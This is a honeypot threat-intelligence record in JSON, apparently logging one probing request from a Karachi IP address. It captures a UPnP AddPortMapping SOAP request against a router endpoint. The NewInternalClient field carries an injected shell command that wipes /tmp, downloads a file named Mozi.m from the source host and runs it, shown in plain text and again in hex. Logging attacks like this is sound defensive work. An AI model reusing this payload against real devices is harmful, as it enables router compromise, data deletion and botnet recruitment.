{"ip":"36.255.44.120","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-06-08T09:53:48","last_seen":"2026-06-08T09:53:48","events_24h":0,"events_7d":0,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Sindh","city":"Karachi","lat":24.8591,"lon":66.9983,"asn":9541,"org":"Cyber Internet Services Pvt Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as9541","label":"Cyber Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/9541"},"cve_matches":[],"top_ports":[{"port":49152,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0700_4784ccc9db2c"]},"fingerprint_peers":{"po11nn0700_4784ccc9db2c":502},"user_agents":["Hello, World"],"timeline":[{"date":"2026-06-08","count":1}],"recent_events":[{"timestamp":"2026-06-08T09:53:48","port":49152,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"630\",\"host\":\"<HONEYPOT>:49152\",\"soapaction\":\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\",\"user-agent\":\"Hello, World\"}","body":"<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://36.255.44.120:49117/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/soap.cgi?service=WANIPConn1","summary":"","payload_hex":"504f5354202f736f61702e6367693f736572766963653d57414e4950436f6e6e3120485454502f312e310d0a486f73743a20<HONEYPOT>3a34393135320d0a436f6e74656e742d4c656e6774683a203633300d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a534f4150416374696f6e3a2075726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a3123416464506f72744d617070696e670d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c534f41502d454e563a426f64793e3c6d3a416464506f72744d617070696e6720786d6c6e733a6d3d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a31223e3c4e6577506f72744d617070696e674465736372697074696f6e3e3c4e6577506f72744d617070696e674465736372697074696f6e3e3c4e65774c656173654475726174696f6e3e3c2f4e65774c656173654475726174696f6e3e3c4e6577496e7465726e616c436c69656e743e606364202f746d703b726d202d7266202a3b7767657420687474703a2f2f33362e3235352e34342e3132303a34393131372f4d6f7a692e6d3b2f746d702f4d6f7a692e6d20646c696e6b603c2f4e6577496e7465726e616c436c69656e743e3c4e6577456e61626c65643e313c2f4e6577456e61626c65643e3c4e657745787465726e616c506f72743e3633343c2f4e657745787465726e616c506f72743e3c4e657752656d6f7465486f73743e3c2f4e657752656d6f7465486f73743e3c4e657750726f746f636f6c3e5443503c2f4e657750726f746f636f6c3e3c4e6577496e7465726e616c506f72743e34353c2f4e6577496e7465726e616c506f72743e3c2f6d3a416464506f72744d617070696e673e3c534f4150454e563a426f64793e3c534f4150454e563a656e76656c6f70653e0d0a0d0a","method":"POST","user_agent":"Hello, World","community_id":"1:4wxY/Kehgt0wTeBPpL2lnuLat88=","ja3":"","session":"175971b7-5779-4b2d-a815-935e0988a7dd","seq":1,"duration_ms":100,"bytes_in":921,"bytes_out":78}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/soap.cgi?service=WANIPConn1","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","Soapaction","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"630","notable":false},{"name":"Host","value":"<HONEYPOT>:49152","notable":false},{"name":"Soapaction","value":"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[],"data_as_of":"2026-06-20T07:49:14.984745+00:00"}